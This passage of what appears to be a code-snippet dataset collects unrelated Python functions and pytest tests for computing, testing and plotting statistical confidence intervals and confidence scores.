= mean1 - ci1\n y1 = mean1 + ci1\n x2 = mean2 - ci2\n y2 = mean2 + ci2\n return does_interval_narrow((x1, y1), (x2, y2))", "def test_conf_interval_normal_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.14, -4.88, -3.24, -2.98), (\n \"quantiles are incorrect\")", "def get_min_confidence(self):\n return self.__min_confidence", "def find_confidence(self, chi2, df):\n chi2_table = self.chi2_table\n nearest_df = round(find_nearest(chi2_table.index, df), 0)\n nearest_chi2 = round(find_nearest(chi2_table.loc[nearest_df], chi2), 6)\n for col in list(chi2_table):\n if nearest_chi2 == round(chi2_table[col][nearest_df], 6):\n # Subtract from one to get confidence.\n confidence = (1.0 - float(col))\n return confidence", "def test_robbins_confidence(self):\n c = array([1,2,3,0,1])\n r = robbins_confidence(c, 0.05)\n n = 7\n s = 2\n k = sqrt(8/0.05)\n self.assertEqual(r, ((s-k)/(n+1), (s+k)/(n+1)))", "def confidence_at_995tpr(self):\r\n\r\n return self.confidence_at_tpr(0.995)", "def getConfidence(self,LeftTup,RightTup):\n\n tup=LeftTup+RightTup\n _intersection=self.getSupport(tup)\n _LHS=self.getSupport(LeftTup)\n _confidence=_intersection/_LHS\n return (_confidence)", "def compare_confints(confidence_intervals, index_verbose=False):\n\n n_features = len(confidence_intervals[0].keys())\n features_limes = []\n for conf_int in confidence_intervals:\n features_limes.append(conf_int.keys())\n unique_features = list(set([l for ll in features_limes for l in ll]))\n\n # Calculate CSI\n overlapping_tot = []\n for feat in unique_features:\n conf_int_feat = []\n for conf_int in confidence_intervals:\n if conf_int.get(feat):\n conf_int_feat.append(conf_int.get(feat))\n\n if len(conf_int_feat) < 2:\n pass\n else:\n overlapping = []\n for pair_intervals in combinations(conf_int_feat, 2):\n i1, i2 = pair_intervals\n is_overlap = True if (i1[0] < i2[1] and i2[0] < i1[1]) else False\n overlapping.append(is_overlap)\n frac_overlapping = round(sum(overlapping) / len(overlapping) * 100, 2)\n overlapping_tot.append(frac_overlapping)\n if index_verbose:\n print(\"\"\"Percentage of overlapping confidence intervals, variable {}: {}%\\n\"\"\".format(\n feat, frac_overlapping))\n\n csi = round(np.mean(overlapping_tot), 2)\n\n # Calculate VSI\n same_vars = 0\n n_combs = 0\n for pair_vars in combinations(features_limes, 2):\n var1, var2 = pair_vars\n same_vars += len(set(var1) & set(var2))\n n_combs += 1\n vsi = round(same_vars / (n_combs * n_features) * 100, 2)\n if index_verbose:\n print(\"\"\"Percentage same variables across repeated LIME calls: {}%\\n\"\"\".format(vsi))\n\n return csi, vsi", "def confidence(self):\n\n choices = 
self.choices\n\n # Get the chi-squared between the top two choices, if more than two choices exist\n if len(choices) >= 2:\n csq = chi_squared(*choices)\n confident = is_confident(csq, len(choices)) if len(choices) <= 10 else None\n else:\n csq = None\n confident = False\n\n return (csq, confident)", "def min_confidence(self) -> float:\n return self._min_confidence", "def cal_confidence(dat):\n\n\talpha = 40.0\n\tconfidence = np.zeros(dat.shape)\n\tconfidence = 1 + alpha * dat\n\treturn np.matrix(confidence)", "def _get_model_confidence_mean(self, exog, alpha=0.1):\n\n res = self._model.fit()\n\n y_fit = self._model.predict(res.params, exog=exog)\n\n u_ci = np.empty(y_fit.shape)\n l_ci = np.empty(y_fit.shape)\n\n x_prime_x_inverse = np.linalg.inv(np.dot(self._model.exog.transpose(), self._model.exog))\n\n t_ppf_value = stats.t.ppf(1 - alpha / 2, self._model.df_resid)\n\n for i in range(len(u_ci)):\n leverage = np.dot(exog[i, :], np.dot(x_prime_x_inverse, exog[i, :]))\n\n interval_distance = t_ppf_value * np.sqrt(res.mse_resid * leverage)\n\n u_ci[i] = y_fit[i] + interval_distance\n l_ci[i] = y_fit[i] - interval_distance\n\n return y_fit, l_ci, u_ci", "def get_confidence(cls, X, y=None):\n scores = []\n for metric_wrapper, weight in cls.confidence_computation.items():\n scores.append(metric_wrapper.calculate(X) * weight)\n return sum(scores)", "def detection_confidence(self):\n return self._detection_confidence", "def confidence_at_99tpr(self):\r\n\r\n return self.confidence_at_tpr(0.99)", "def confidence(self, value):\n if not self.can_update():\n self._handle_error(910, [self.type])\n request_data = {'confidence': value}\n return self.tc_requests.update(\n self.api_type, self.api_branch, self.unique_id, request_data, owner=self.owner\n )", "def test_conf_interval_normal_method_with_bounds(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with enforced lower limit (``min_admissible_value``)\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=290.0,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.0, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (290.0, 290.0, 290.0, 290.0), (\n \"quantiles are incorrect\")", "def ci_prop(p, n, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # standard error\n std_error = np.sqrt(p * (1 - p) / n)\n # find the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n # calculate lower and upper confidence bounds\n lcb = np.round(p - margin_of_error, 2)\n ucb = np.round(p + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Proportion: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def 
test_conf_interval_normal_method_no_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=None,\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.05, 290.37, 292.42, 292.74), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.41, -5.08, -3.04, -2.72), (\n \"quantiles are incorrect\")", "def calc_confidence(self, last_n_matches=None):\n if last_n_matches is None:\n # use all the matches\n last_n_matches = len(self.slopes)\n\n # only start processing once we've gotten a few frames\n if len(self.matches_per_frame) < self.min_frames:\n return\n \n # calculate confidence interval of the slope of the last N matches\n np_slopes = np.array(self.slopes[-last_n_matches:])\n m = np.mean(np_slopes)\n se = scipy.stats.sem(np_slopes)\n h = se * scipy.stats.t.ppf((1+self.confidence)/2.0, len(np_slopes)-1)\n\n # update class variables\n self.confidence_interval = [m-h, m+h]\n self.rho = m", "def create_interval_NEW(confidence, samples=False, n_samples=False, sample_mean=False, sd=False, true_std=False, is_prob=False, is_normal=False, side=\"both\"):\n h = 0\n\n if samples:\n n_samples = len(samples)\n sample_mean = float(np.mean(samples))\n sd = float(np.std(samples))\n std_err = float(st.sem(samples))\n else:\n if sd is False and n_samples < 30:\n raise Exception(\"confidence intervals\", \"Missing standard deviation to estimate mean with less than 30 samples.\")\n else:\n std_err = sd / math.sqrt(n_samples)\n\n if side == \"both\":\n alpha = (1 - confidence) / 2\n z = st.norm.ppf(1 - (1 - confidence) / 2)\n t = st.t.ppf((1 + confidence) / 2, n_samples - 1)\n else:\n alpha = (1 - confidence)\n z = st.norm.ppf(1 - (1 - confidence))\n t = st.t.ppf((1 + confidence), n_samples - 1)\n\n if is_prob: ## CI for probabilities\n if sample_mean == 0: ## Rule of three\n return Interval(0, 3/n_samples)\n elif sample_mean == 1: ## Rule of three\n return Interval(1 - 3/n_samples, 1)\n elif n_samples >= 30: ## Binomial proportion confidence interval: Normal/Gaussian distribution of the proportion: https://machinelearningmastery.com/confidence-intervals-for-machine-learning/\n h = z * math.sqrt((sample_mean * (1 - sample_mean)) / n_samples)\n elif n_samples < 30:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n ## h = t * math.sqrt((mean * (1 - mean)) / n_samples) ## TODO, check this\n else: ## CI for usual values\n if (n_samples >= 30 or is_normal) and true_std is not False: ## use Normal Distribution\n h = z * true_std / math.sqrt(n_samples)\n elif is_normal: ## use Student distribution\n # h = t * s / math.sqrt(n_samples)\n h = t * std_err\n else:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval 
estimate\n return Interval(interval[0], interval[1])\n\n h = float(h)\n if side == \"both\":\n return Interval(sample_mean - h, sample_mean + h)\n elif side == \"right\":\n if is_prob:\n return Interval(0, sample_mean + h)\n else:\n return Interval(float('-inf'), sample_mean + h)\n else:\n if is_prob:\n return Interval(sample_mean - h, 1)\n else:\n return Interval(sample_mean - h, float('inf'))", "def test_conf_interval_normal_method_no_small_sample_calc(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no small sample size calculation\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=None,\n small_sample_size_method=None,\n small_sample_size_quantile=None,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.64, -5.26, -2.86, -2.49), (\n \"quantiles are incorrect\")", "def robbins_confidence(counts, alpha=0.05):\n s = singles(counts)\n n = counts.sum()\n k = sqrt((n+1)/alpha)\n return (s-k)/(n+1), (s+k)/(n+1)", "def confidence_at_tpr(self, tpr):\r\n\r\n assert self.validation_confidences is not None\r\n assert tpr > 0\r\n\r\n # true positives are correctly classified examples\r\n if self.sorted_correct_validation_confidences is None:\r\n correct_validation_confidences = self.validation_confidences[numpy.logical_not(self.validation_errors)]\r\n self.sorted_correct_validation_confidences = numpy.sort(numpy.copy(correct_validation_confidences))\r\n # rounding is a hack see tests\r\n cutoff = math.floor(self.sorted_correct_validation_confidences.shape[0] * round((1 - tpr), 2))\r\n assert cutoff >= 0\r\n assert cutoff < self.sorted_correct_validation_confidences.shape[0]\r\n return self.sorted_correct_validation_confidences[cutoff]", "def _calculate_covariance_error(self, lc_x, lc_y):\n # Excess Variance of reference band\n xs_x = self._calculate_excess_variance(lc_x)\n # Standard deviation of light curve\n err_y = self._calculate_std(lc_y)\n # Excess Variance of reference band\n xs_y = self._calculate_excess_variance(lc_y)\n # Standard deviation of light curve\n err_x = self._calculate_std(lc_x)\n # Number of time bins in lightcurve\n N = lc_x.ncounts\n # Number of segments averaged\n if not self.avg_covar:\n M = 1\n else:\n M = self.nbins\n\n num = xs_x*err_y + xs_y*err_x + err_x*err_y\n denom = N * M * xs_y\n\n return (num / denom)**0.5", "def state_confidences(self, X: List[np.ndarray], **kwargs) -> List[np.ndarray]:", "def __call__(self, observation, precision_digits=None, search_region=None):\n if precision_digits is None:\n precision_digits = self.precision_digits\n if search_region is None:\n search_region = [0, round_to_digits(10 + 3 * len(observation), precision_digits)]\n if self.statistic.mu_dependent:\n value = self.statistic(observation, self.statistic.mus)\n else:\n value = self.statistic(observation, None)\n self.log.debug(\"Statistic evaluates to %s\" % value)\n 
return self.get_confidence_interval(value, precision_digits=precision_digits, search_region=search_region)", "def compute_ci(yhat, yhat_var, ci_level):\n z_mapping = {0.95: 1.96,\n 0.99: 2.58}\n z = z_mapping[ci_level]\n\n ci_lower = yhat - yhat_var * z\n ci_upper = yhat + yhat_var * z\n\n return ci_lower, ci_upper", "def computeCI(cov, mean):\n mult = 2\n sd = np.diag(cov)**(0.5)\n lower = mean - (mult*sd).reshape(-1,1)\n upper = mean + (mult*sd).reshape(-1,1)\n return lower, upper", "def calc_confidence_level(self, z_value):\n\n confidence_level = 0.5 * (1 + math.erf(z_value/2**0.5))\n\n return confidence_level", "def test_diff_count_precision():\n dump = False # setting to True implies results printed and test fails\n seed = 123456789\n bs_samples = 1000\n alpha = 0.025 # implies 95% confidence interval\n # compute stderr and confidence interval for STANDARD bin 10 increase count\n data_list = [111.5421] * 287 + [0.0] * (10570 - 287)\n assert len(data_list) == 10570\n data = np.array(data_list)\n assert (data > 0).sum() == 287\n data_estimate = np.sum(data) * 1e-3\n assert abs((data_estimate / 32) - 1) < 0.0005\n bsd = bootstrap_se_ci(data, seed, bs_samples, np.sum, alpha)\n stderr = bsd['se'] * 1e-3\n cilo = bsd['cilo'] * 1e-3\n cihi = bsd['cihi'] * 1e-3\n if dump:\n res = '{}EST={:.1f} B={} alpha={:.3f} se={:.2f} ci=[ {:.2f} , {:.2f} ]'\n print(\n res.format('STANDARD-BIN10: ',\n data_estimate, bs_samples, alpha, stderr, cilo, cihi)\n )\n assert abs((stderr / 1.90) - 1) < 0.0008\n # NOTE: a se of 1.90 thousand implies that when comparing the difference\n # in the weighted number of filing units in STANDARD bin 10 with a\n # tax increase, the difference statistic has a bigger se (because\n # the variance of the difference is the sum of the variances of the\n # two point estimates). So, in STANDARD bin 10 if the point\n # estimates both had se = 1.90, then the difference in the point\n # estimates has has a se = 2.687. This means that the difference\n # would have to be over 5 thousand in order for there to be high\n # confidence that the difference was different from zero in a\n # statistically significant manner.\n # Or put a different way, a difference of 1 thousand cannot be\n # accurately detected while a difference of 10 thousand can be\n # accurately detected.\n assert abs((cilo / 28.33) - 1) < 0.0012\n assert abs((cihi / 35.81) - 1) < 0.0012\n # compute stderr and confidence interval for STANDARD bin 11 increase count\n data_list = [27.517] * 981 + [0.0] * (23113 - 981)\n assert len(data_list) == 23113\n data = np.array(data_list)\n assert (data > 0).sum() == 981\n data_estimate = np.sum(data) * 1e-3\n assert abs((data_estimate / 27) - 1) < 0.0005\n bsd = bootstrap_se_ci(data, seed, bs_samples, np.sum, alpha)\n stderr = bsd['se'] * 1e-3\n cilo = bsd['cilo'] * 1e-3\n cihi = bsd['cihi'] * 1e-3\n if dump:\n res = '{}EST={:.1f} B={} alpha={:.3f} se={:.2f} ci=[ {:.2f} , {:.2f} ]'\n print(\n res.format('STANDARD-BIN11: ',\n data_estimate, bs_samples, alpha, stderr, cilo, cihi)\n )\n assert abs((stderr / 0.85) - 1) < 0.0040\n # NOTE: a se of 0.85 thousand implies that when comparing the difference\n # in the weighted number of filing units in STANDARD bin 11 with a\n # tax increase, the difference statistic has a bigger se (because\n # the variance of the difference is the sum of the variances of the\n # two point estimates). So, in STANDARD bin 11 if point estimates\n # both had se = 0.85, then the difference in the point estimates has\n # has a se = 1.20. 
This means that the difference would have to be\n # over 2.5 thousand in order for there to be high confidence that the\n # difference was different from zero in a statistically significant\n # manner.\n # Or put a different way, a difference of 1 thousand cannot be\n # accurately detected while a difference of 10 thousand can be\n # accurately detected.\n assert abs((cilo / 25.37) - 1) < 0.0012\n assert abs((cihi / 28.65) - 1) < 0.0012\n # fail if doing dump\n assert not dump", "def estimates_conf(self):\n return self._est_L, self._est_R", "def _interval_example(avg_price_with_interval):\n ch = chartify.Chart(blank_labels=True, x_axis_type=\"categorical\")\n ch.set_title(\"Interval plots\")\n ch.set_subtitle(\"Represent variation. Optional `middle_column` to mark a middle point.\")\n ch.plot.interval(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n lower_bound_column=\"lower_ci\",\n upper_bound_column=\"upper_ci\",\n middle_column=\"mean\",\n )\n ch.show(_OUTPUT_FORMAT)", "def test_chao1_confidence(self): \n #NOTE: EstimateS rounds to 2 dp\n self.assertFloatEqual(chao1_confidence(self.TestData), (9.07,17.45), \\\n eps=0.01)\n self.assertFloatEqual(chao1_confidence(self.TestData, \\\n bias_corrected=False), (9.17,21.89), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoSingles),\\\n (4, 4.95), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoSingles, \\\n bias_corrected=False), (4,4.95), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoDoubles), \\\n (4.08,17.27), eps=0.01)\n self.assertFloatEqualAbs(chao1_confidence(self.NoDoubles, \\\n bias_corrected=False), (4.08,17.27), eps=0.01)", "def confidence(self, confidence: float):\n\n self._confidence = confidence", "def get_confidence_interval(self, value, precision_digits, search_region, debug=False):\n log_value = np.log10(value)\n if self.wrap_interpolator:\n # Try to interpolate the limit from limits computed earlier\n self.log.debug(\"Trying to get values from interpolators\")\n try:\n if self.fixed_lower_limit is None:\n low_limit = 10**(self.low_limit_interpolator(log_value))\n else:\n low_limit = self.fixed_lower_limit\n if self.fixed_upper_limit is None:\n high_limit = 10**(self.high_limit_interpolator(log_value))\n else:\n high_limit = self.fixed_upper_limit\n return low_limit, high_limit\n except InsufficientPrecisionError:\n self.log.debug(\"Insuffienct precision achieved by interpolators\")\n if log_value > self.interpolator_log_domain[1]:\n self.log.debug(\"Too high value to dare to start Neyman construction... raising exception\")\n # It is not safe to do the Neyman construction: too high statistics\n raise\n self.log.debug(\"Log value %s is below interpolator log domain max %s \"\n \"=> starting Neyman construction\" % (log_value, self.interpolator_log_domain[1]))\n except OutsideDomainError:\n # The value is below the interpolator domain (e.g. 
0 while the domain ends at 10**0 = 1)\n pass\n\n if self.forbid_exact_computation:\n raise RuntimeError(\"Exact computation triggered\")\n\n def is_value_in(mu):\n low_lim, high_lim = self.get_interval_on_statistic(mu + self.background,\n precision_digits=precision_digits)\n return low_lim <= value <= high_lim\n\n # We first need one value in the interval to bound the limit searches\n try:\n true_point, low_search_bound, high_search_bound = search_true_instance(is_value_in,\n *search_region,\n precision_digits=precision_digits)\n except SearchFailedException as e:\n self.log.debug(\"Exploratory search could not find a single value in the interval! \"\n \"This is probably a problem with search region, or simply a very extreme case.\"\n \"Original exception: %s\" % str(e))\n if is_value_in(0):\n self.log.debug(\"Oh, ok, only zero is in the interval... Returning (0, 0)\")\n return 0, 0\n return 0, float('inf')\n\n self.log.debug(\">>> Exploratory search completed: %s is in interval, \"\n \"search for boundaries in [%s, %s]\" % (true_point, low_search_bound, high_search_bound))\n\n if self.fixed_lower_limit is not None:\n low_limit = self.fixed_lower_limit\n elif is_value_in(low_search_bound):\n # If mu=0 can't be excluded, we're apparently only setting an upper limit (mu <= ..)\n low_limit = 0\n else:\n low_limit = bisect_search(is_value_in, low_search_bound, true_point, precision_digits=precision_digits)\n self.log.debug(\">>> Low limit found at %s\" % low_limit)\n\n if self.fixed_upper_limit is not None:\n low_limit = self.fixed_upper_limit\n elif is_value_in(high_search_bound):\n # If max_mu can't be excluded, we're apparently only setting a lower limit (mu >= ..)\n high_limit = float('inf')\n else:\n high_limit = bisect_search(is_value_in, true_point, high_search_bound, precision_digits=precision_digits)\n self.log.debug(\">>> High limit found at %s\" % high_limit)\n\n if self.wrap_interpolator:\n # Add the values to the interpolator, if they are within the domain\n # TODO: Think about dealing with inf\n if self.interpolator_log_domain[0] <= log_value <= self.interpolator_log_domain[1]:\n if self.fixed_lower_limit is None:\n self.low_limit_interpolator.add_point(log_value, np.log10(low_limit))\n if self.fixed_upper_limit is None:\n self.high_limit_interpolator.add_point(log_value, np.log10(high_limit))\n\n return low_limit, high_limit", "def _interval_example2(avg_price_with_interval):\n ch = chartify.Chart(blank_labels=True, x_axis_type=\"categorical\")\n ch.set_title(\"Combined interval plot & bar plot\")\n ch.plot.bar(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n numeric_column=\"mean\",\n )\n ch.plot.interval(\n data_frame=avg_price_with_interval,\n categorical_columns=\"fruit\",\n lower_bound_column=\"lower_ci\",\n upper_bound_column=\"upper_ci\",\n )\n ch.show(_OUTPUT_FORMAT)", "def _lower_confidence_bound(self, NA: int, N: int, alpha: float) -> float:\n return proportion_confint(NA, N, alpha=2 * alpha, method=\"beta\")[0]", "def cre_confidence2(df): \r\n cre_list = df.creline.unique()\r\n areas = df.source.unique()\r\n n=len(areas)\r\n confnew =pd.DataFrame(np.zeros(len(df.index)),index=df.index, columns=['conf'])\r\n \r\n for kk in range(0,len(cre_list)):\r\n df_cre = df[df.creline == cre_list[kk]]\r\n print cre_list[kk]\r\n count_sym = 0\r\n count_sameffb = 0\r\n for ii in range(0,n):\r\n for jj in range(ii+1,n):\r\n ij_ffb = np.array(df_cre[(df.source == areas[ii])&(df.target == areas[jj])].ffb_c)\r\n ji_ffb = np.array(df_cre[(df.source == 
areas[jj])&(df.target == areas[ii])].ffb_c)\r\n if len(ij_ffb)==1 and len(ji_ffb)==1:\r\n count_sym = count_sym+1\r\n if ij_ffb == ji_ffb:\r\n count_sameffb = count_sameffb+1 \r\n confnew[df.creline == cre_list[kk]] = 1-count_sameffb/count_sym\r\n return confnew", "def test_error_at_confidence(self, threshold):\r\n\r\n nominator = numpy.sum(numpy.logical_and(self.test_errors, self.test_confidences >= threshold))\r\n denominator = numpy.sum(self.test_confidences >= threshold)\r\n if denominator > 0:\r\n return nominator / float(denominator)\r\n else:\r\n return 0", "def compute_adjacency_confidence(self, full_attachedness, tree_adjacency, tree_based_confidence):\n if sp.sparse.issparse(tree_adjacency):\n tree_adjacency = [tree_adjacency[i].nonzero()[1] for i in range(tree_adjacency.shape[0])]\n segs_distances = 1/full_attachedness\n if not tree_based_confidence: # inter- and intra-cluster based confidence\n from scipy.stats import norm\n # intra-cluster connections\n total_n = self.k * np.array(self.segs_sizes) # total number of connections\n a = full_attachedness\n confidence = np.zeros_like(full_attachedness)\n for i in range(a.shape[0]):\n for j in range(i+1, a.shape[1]):\n expected = total_n[i] * total_n[j] / np.sum(total_n)**2\n actual = a[i, j] / np.sum(total_n)\n variance = expected * (1 - expected) / np.sum(total_n)\n if actual > expected:\n confidence[i, j] = 1\n elif actual < 1e-12:\n confidence[i, j] = 0\n else:\n confidence[i, j] = 2 * norm.cdf(actual, expected, np.sqrt(variance))\n # i_name = self.segs_names_original[i]\n # j_name = self.segs_names_original[j]\n # print(i_name, j_name, expected, actual, variance, confidence[i, j])\n full_confidence = confidence + confidence.T\n tree_confidence = self.compute_tree_confidence(full_confidence, tree_adjacency)\n else:\n # compute the average tree distances\n tree_distances = []\n for i, neighbors in enumerate(tree_adjacency):\n tree_distances += segs_distances[i][neighbors].tolist()\n median_tree_distances = np.median(tree_distances)\n full_confidence = np.zeros_like(segs_distances)\n full_confidence[segs_distances <= median_tree_distances] = 1\n full_confidence[segs_distances > median_tree_distances] = (\n np.exp(-(segs_distances-median_tree_distances)/median_tree_distances)\n [segs_distances > median_tree_distances])\n np.fill_diagonal(full_confidence, 0)\n tree_confidence = self.compute_tree_confidence(full_confidence, tree_adjacency, minimal_tree_attachedness=MINIMAL_TREE_ATTACHEDNESS)\n return full_confidence, tree_confidence", "def test_conf_interval_normal_method_fallback(data):\n df = data[\"df\"]\n df = df.sample(n=10)\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"normal_fit\"``\n # fallback expected for all slices as df is small (10)\n # and ``sample_size_thresh`` is large (20)\n with pytest.warns(Warning):\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=20,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert 
pred_df[\"y_quantile_summary\"].values[5] == (290.31, 290.57, 292.23, 292.49), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def confidence(s, p):\r\n\r\n if p == 1:\r\n return (-oo, oo)\r\n\r\n assert p <= 1\r\n\r\n # In terms of n*sigma, we have n = sqrt(2)*ierf(p). The inverse\r\n # error function is not yet implemented in SymPy but can easily be\r\n # computed numerically\r\n\r\n from sympy.numerics import Float, secant, evalf\r\n from sympy.numerics.functions2 import erf\r\n p = evalf(p)\r\n # calculate y = ierf(p) by solving erf(y) - p = 0\r\n y = secant(lambda y: erf(y) - p, 0)\r\n t = Real(str(evalf(s.sigma) * Float(2)**0.5 * y))\r\n mu = s.mu.evalf()\r\n return (mu-t, mu+t)", "def confidence_coefficient( confidence_level, dimensions=1 ):\n return np.sqrt(chi2.ppf(confidence_level, df=dimensions))", "def calcAccuracy(measuredConc, expectedConc):\n accuracy = (numpy.mean(measuredConc) / expectedConc) * 100\n return accuracy", "def ci_mean_std_known(array, std, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n mean = np.mean(array)\n n = len(array)\n # calculate standard error\n std_error = std / np.sqrt(n)\n # find z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def plot_bootstrapped_reliability_curve(\n axes_object, ci_bottom_dict, ci_mean_dict, ci_top_dict,\n line_colour=DEFAULT_RELIABILITY_COLOUR,\n line_width=DEFAULT_RELIABILITY_WIDTH,\n perfect_line_colour=DEFAULT_PERFECT_RELIABILITY_COLOUR,\n perfect_line_width=DEFAULT_PERFECT_RELIABILITY_WIDTH):\n\n plot_reliability_curve(\n axes_object=axes_object,\n mean_forecast_by_bin=ci_mean_dict[\n model_eval.MEAN_FORECAST_BY_BIN_KEY],\n event_frequency_by_bin=ci_mean_dict[model_eval.EVENT_FREQ_BY_BIN_KEY],\n line_colour=line_colour, line_width=line_width,\n perfect_line_colour=perfect_line_colour,\n perfect_line_width=perfect_line_width)\n\n polygon_object = _confidence_interval_to_polygon(\n x_coords_bottom=ci_bottom_dict[model_eval.MEAN_FORECAST_BY_BIN_KEY],\n y_coords_bottom=ci_bottom_dict[model_eval.EVENT_FREQ_BY_BIN_KEY],\n x_coords_top=ci_top_dict[model_eval.MEAN_FORECAST_BY_BIN_KEY],\n y_coords_top=ci_top_dict[model_eval.EVENT_FREQ_BY_BIN_KEY]\n )\n\n polygon_colour = matplotlib.colors.to_rgba(\n plotting_utils.colour_from_numpy_to_tuple(line_colour),\n TRANSPARENCY_FOR_CONFIDENCE_INTERVAL\n )\n\n polygon_patch = PolygonPatch(\n polygon_object, lw=0, ec=polygon_colour, fc=polygon_colour)\n\n axes_object.add_patch(polygon_patch)", "def _metrics_ci(self, label_true, y_pred):\n hr_pred = -y_pred\n ci = concordance_index(label_true['t'], hr_pred, label_true['e'])\n return ci", "def confidence(self, confidence):\n self._confidence = confidence", "def confidence(self, confidence):\n self._confidence = confidence", "def test_error_curve(self):\r\n\r\n scores = self.test_confidences\r\n sort = numpy.argsort(scores, axis=0)\r\n sorted_scores = scores[sort]\r\n\r\n test_errors = numpy.zeros((scores.shape[0]))\r\n thresholds = numpy.zeros((scores.shape[0]))\r\n\r\n for i in 
